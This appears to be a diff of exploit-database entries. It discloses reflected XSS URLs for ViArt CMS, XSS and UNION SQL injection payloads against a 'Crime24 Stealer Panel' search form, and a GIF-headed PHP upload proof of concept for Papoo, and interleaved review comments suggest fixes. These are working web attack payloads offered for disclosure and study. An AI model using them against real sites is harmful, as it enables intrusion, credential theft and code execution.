http://www.example.com/cms-demo/forums.php?category_id=1>"><ScRiPt %0D%0A>alert(522558583855)%3B</ScRiPt>

platforms/php/webapps/33156.txt Executable file

@ -0,0 +1,53 @@
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# ____ _ _ ____
# | _ \ __ _(_)___ _ _| | _____ | _ \ __ _ _ __
# | | | |/ _` | / __| | | | |/ / _ \ | | | |/ _` | '_ \
# | |_| | (_| | \__ \ |_| | < __/ | |_| | (_| | | | |
# |____/ \__,_|_|___/\__,_|_|\_\___| |____/ \__,_|_| |_|
#
# #CyberNinja | My katana can slay any security!
# >> Twitter @TheHackersBay
# >> Pentester / Underground hacker
#
# Exploit Title: Crime24 Stealer Panel <= Multiple Vulnerabilities
# Date: Sunday May 3 2014
# Exploit Author: Daisuke Dan
# Vendor Homepage: Crime24.net
# Version: v.1
# Tested on: Windows Seven
# Blog post: http://thehackersbay.org/blog/2014/05/03/crime24-stealer-panel/
#
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
An attacker can execute an XSS and inject sql commands in the search form.
You must be logged in the admin panel.
#=========================== EXPLOITATION ==============================
0x01 Detecting the error
POST: http://site.com/?action=search
POST Content: q='"><img+src=x+onerror=prompt('DaisukeDan');>&in=1&search=Search
Example: http://i.imgur.com/zyIr5xv.png
Result: Cross site scripting + SQL error
0x02 Exploit the SQL Injection
[+] Vulnerable code:
$result = mysql_query("SELECT * FROM `logs` WHERE `".$cols[$_POST["in"]]."` LIKE '%".$_POST["q"]."%';", $mysql);
POST: http://site.com/?action=search
POST Content:
q=' union select 1,2,group_concat(column_name,0x0a),4,5,6,7,8 from information_schema.columns where table_name=0x6c6f6773-- -
&in=1&search=Search
Example: http://i.imgur.com/t4ydLsR.png
You have access to all the database.
#=========================== Gr33tz =============================#
| Raw-x | eth0 | Downfall | XzLt | Insider | rootaccess | Yasker |
| EZiX | Negative | ajkaro | Un0wn_X | H4T | NeTwork | Pent0thal |
#================================================================#
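Review bot: the `mysql_query(...)` line quoted under "[+] Vulnerable code" carries two untrusted inputs, not one: `$_POST["q"]` is concatenated into the `LIKE '%...%'` literal (the injection shown in 0x02), and `$_POST["in"]` is used as an index into `$cols` with no existence check, so an unexpected value produces a PHP notice and an empty backtick-quoted column name. The remediation the entry should point to is an allowlist check on `in` (`isset($cols[$_POST["in"]])`), a bound parameter for `q` through mysqli or PDO instead of string building, and an HTML-escaped echo of the search term, which also closes the reflected XSS from 0x01. Style: "Crime24 Stealer Panel <= Multiple Vulnerabilities" has a dangling `<=` with no version after it, while the `Version:` line says v.1.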


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/36003/info
ViArt CMS is prone to multiple cross site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible.
http://www.example.com/cms-demo/forum.php?forum_id=1>"><ScRiPt %0D%0A>alert(522558583855)%3B</ScRiPt>


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/36003/info
ViArt CMS is prone to multiple cross site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible.
http://www.example.com/cms-demo/forum_topic_new.php?forum_id=1>"><ScRiPt %0D%0A>alert(522558583855)%3B</ScRiPt>

platforms/php/webapps/33160.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/36006/info
Papoo is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately validate user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
The following command will generate a file with a valid GIF header that runs the 'phpinfo()' function when requested:
$ printf "GIF89a\x01\x00\x01\x00<?php phpinfo();?>" > poc.php
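Review bot: the entry names neither the upload form nor the check that lets a `.php` filename through once the content starts with a GIF signature, so a reader cannot confirm the issue or verify a fix from these lines alone; the affected endpoint and the accepted extension should be stated. As remediation it is worth noting that a `GIF89a` prefix says nothing about the rest of the file, so the fix is to allowlist the stored extension and content type independently of the magic bytes, and to keep uploads outside the document root or under a location where the web server refuses to execute scripts.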